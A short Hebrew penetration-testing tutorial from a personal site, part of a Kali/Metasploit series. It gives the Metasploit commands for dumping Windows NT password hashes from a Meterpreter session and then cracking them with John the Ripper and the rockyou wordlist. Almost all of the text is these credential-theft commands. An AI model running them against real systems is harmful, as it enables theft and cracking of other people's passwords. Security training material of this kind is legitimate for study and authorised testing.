כל הזכויות שמורות לטל בן שושן – Shushan.co.il
הוצאת Hash Dump ע"י Meterpreter ופיצוח הסיסמא ע"י John the Ripper
על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit
התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit
John the Ripper – מאפשר לנו לנסות לפצח סיסמאות לפי פורמטים, במקרה שלנו הסיסמאות שנקבל הם מסוג NT Hash
המדריך דורש:
- KALI
- ביצוע התחברות ל Meterpreter
נלחץ על Ctrl +Z על מנת להכניס את ה Session של ה Meterpreter לרקע
Meterpreter >
כעת הוא יחזור ל
msf exploit >
נשתמש בפקודה
msf exploit > use post/windows/gather/hashdump
נגדיר לו שה Session שלנו הוא מספר 1 (אם לא, בדקו על ידי session -l)
msf post(hashdump) > set session 1
רשמו run
msf post(hashdump) > run
כעת נוריד מהאינטרנט קובץ המכיל סיסמאות ובכך יוכל הJohnTheRipper לפצח את הסיסמא, נפתח את הטרמינל בקאלי
sudo wget http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt
כעת נעתיק את התוצאה של HashDump ל Leafpad ונשמור אותו ב Root (מוסבר בשורה למטה)
/root/
בשם
password.txt
נבדוק שהוא יושב בנתיב /root/ ונקיש את הפקודה
sudo john --wordlist=/root/rockyou.txt --format=NT /root/password.txt
לחצו Enter
מעולה, הוא הצליח להשיג את הסיסמא
